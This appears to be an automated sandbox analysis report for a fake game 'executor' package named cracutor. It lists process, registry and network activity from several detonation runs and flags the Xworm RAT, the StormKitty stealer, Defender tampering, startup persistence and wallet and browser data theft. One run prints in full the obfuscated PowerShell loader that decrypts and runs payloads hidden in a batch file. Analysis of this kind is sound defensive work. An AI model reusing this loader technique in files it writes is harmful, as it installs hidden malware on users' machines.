win10v2004-20240426-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 89.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

118s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1288 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zFCOPqZUpxhO5ciHbZM4ROMYeYlSpVgI4g7jD8zHAUY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vDZO0S7Am6YBYCRTxFXCyQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zAiLC=New-Object System.IO.MemoryStream(,$param_var); $YmoSv=New-Object System.IO.MemoryStream; $vqshj=New-Object System.IO.Compression.GZipStream($zAiLC, [IO.Compression.CompressionMode]::Decompress); $vqshj.CopyTo($YmoSv); $vqshj.Dispose(); $zAiLC.Dispose(); $YmoSv.Dispose(); $YmoSv.ToArray();}function execute_function($param_var,$param2_var){ $qmwRL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dQiwA=$qmwRL.EntryPoint; $dQiwA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat';$kqgmW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat').Split([Environment]::NewLine);foreach ($RIPei in $kqgmW) { if ($RIPei.StartsWith(':: ')) { $flwkS=$RIPei.Substring(3); break; }}$payloads_var=[string[]]$flwkS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

memory/2744-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

memory/2744-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

memory/2744-6-0x000000001B340000-0x000000001B622000-memory.dmp

memory/2744-8-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2744-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

memory/2744-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

memory/2744-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

144s

Max time network

108s

Command Line

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

Signatures

N/A

Processes

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 89.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

memory/4368-1-0x00007FFCC6CED000-0x00007FFCC6CEE000-memory.dmp

memory/4368-0-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4368-2-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4368-3-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240508-en

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Signatures

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 scriptblox.com udp
US 172.67.68.166:443 scriptblox.com tcp

Files

memory/1688-0-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

memory/1688-1-0x0000000000100000-0x00000000002FE000-memory.dmp

memory/1688-2-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-3-0x0000000004C60000-0x0000000004CFE000-memory.dmp

memory/1688-4-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-6-0x00000000005A0000-0x00000000005AA000-memory.dmp

memory/1688-5-0x00000000005A0000-0x00000000005AA000-memory.dmp

memory/1688-7-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

memory/1688-11-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-12-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-14-0x00000000005A0000-0x00000000005AA000-memory.dmp

memory/1688-13-0x00000000005A0000-0x00000000005AA000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

121s

Max time network

123s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

92s

Max time network

94s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240220-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pdb C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pdb\ = "pdb_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 9e37514ff103460380b465d4530d009a
SHA1 0b8c30d62dae5d576d2c0735abcef15610235982
SHA256 1587e9f22c1036b8f1141d5c22a952f77596a4a9ead4c4b60834af0f7c86a78d
SHA512 8545e952fea421b9be25fbbef423840c6fbb62b7a9ddc16d75b62d50d9a7122c21b42440e3dc171e42c8e0ca176df6fa366deca96361b22d236580bbd047e865

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

133s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240220-en

Max time kernel

118s

Max time network

120s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.cfig C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\ C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.cfig\ = "cfig_auto_file" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 0ea99233b8862c2569f2f4aa8d93831a
SHA1 28dc72da59fd83ad6f480546e42dafc6ad63bd8b
SHA256 13296307a84113f8315b21effdedc28f49156cb97b3941aec7791ea2d64c019d
SHA512 5bfe2e075eabe50f6981a24f18b1a0d04713ef32b91164da0d59b32162ecd1a02f097d6d2de0d9198fbaeba5e30b95469331525645497453bd8f2c4bfef1617a

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240215-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 c98cd428c733d3821e753865ab588677
SHA1 7eec31bbf4b870dfdfa3f964c54dbf178c209771
SHA256 546d1061ff0bb4d2cfc3257e0178f60981e4f590930c549215b49ae2f031d2b6
SHA512 459bec257d97670d8696214da8f816c64081f8f8cb0c7067fd64eda592de82a6e56a45bd0c10a4006da7427996e628d868fe4b33cf5bc4edea02281e33194c75

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240215-en

Max time kernel

121s

Max time network

122s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240508-en

Max time kernel

122s

Max time network

122s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

118s

Max time network

143s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klxcnl.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
